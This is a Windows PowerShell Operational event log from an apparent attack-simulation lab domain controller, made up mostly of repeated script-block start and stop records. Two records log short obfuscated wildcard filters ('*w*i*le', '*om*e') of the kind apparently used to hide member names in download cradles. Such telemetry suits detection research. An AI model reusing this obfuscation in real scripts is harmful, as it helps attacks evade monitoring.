EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475935
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475934
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475933
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475932
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475931
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475930
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475929
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475928
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475927
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475926
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475925
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475924
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475923
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475922
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475921
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1475920
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{$_.Name-like'*w*i*le'}

ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Path:
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475919
Keywords=None
Message=Completed invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475918
Keywords=None
Message=Started invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475917
Keywords=None
Message=Completed invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475916
Keywords=None
Message=Started invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475915
Keywords=None
Message=Completed invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475914
Keywords=None
Message=Started invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475913
Keywords=None
Message=Completed invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475912
Keywords=None
Message=Started invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475911
Keywords=None
Message=Completed invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475910
Keywords=None
Message=Started invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475909
Keywords=None
Message=Completed invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475908
Keywords=None
Message=Started invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475907
Keywords=None
Message=Completed invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475906
Keywords=None
Message=Started invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475905
Keywords=None
Message=Completed invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475904
Keywords=None
Message=Started invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475903
Keywords=None
Message=Completed invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475902
Keywords=None
Message=Started invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475901
Keywords=None
Message=Completed invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475900
Keywords=None
Message=Started invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475899
Keywords=None
Message=Completed invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475898
Keywords=None
Message=Started invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475897
Keywords=None
Message=Completed invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475896
Keywords=None
Message=Started invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475895
Keywords=None
Message=Completed invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475894
Keywords=None
Message=Started invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475893
Keywords=None
Message=Completed invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475892
Keywords=None
Message=Started invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475891
Keywords=None
Message=Completed invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475890
Keywords=None
Message=Started invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475889
Keywords=None
Message=Completed invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475888
Keywords=None
Message=Started invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475887
Keywords=None
Message=Completed invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475886
Keywords=None
Message=Started invocation of ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1475885
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{$_.Name-like'*om*e'}

ScriptBlock ID: b532a169-88cc-4b05-ab38-f21b614c7167
Path:
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475884
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475883
Keywords=None
Message=Started invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475882
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475881
Keywords=None
Message=Started invocation of ScriptBlock ID: 62715f50-35fb-4908-aa4b-a8473c6ea631
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
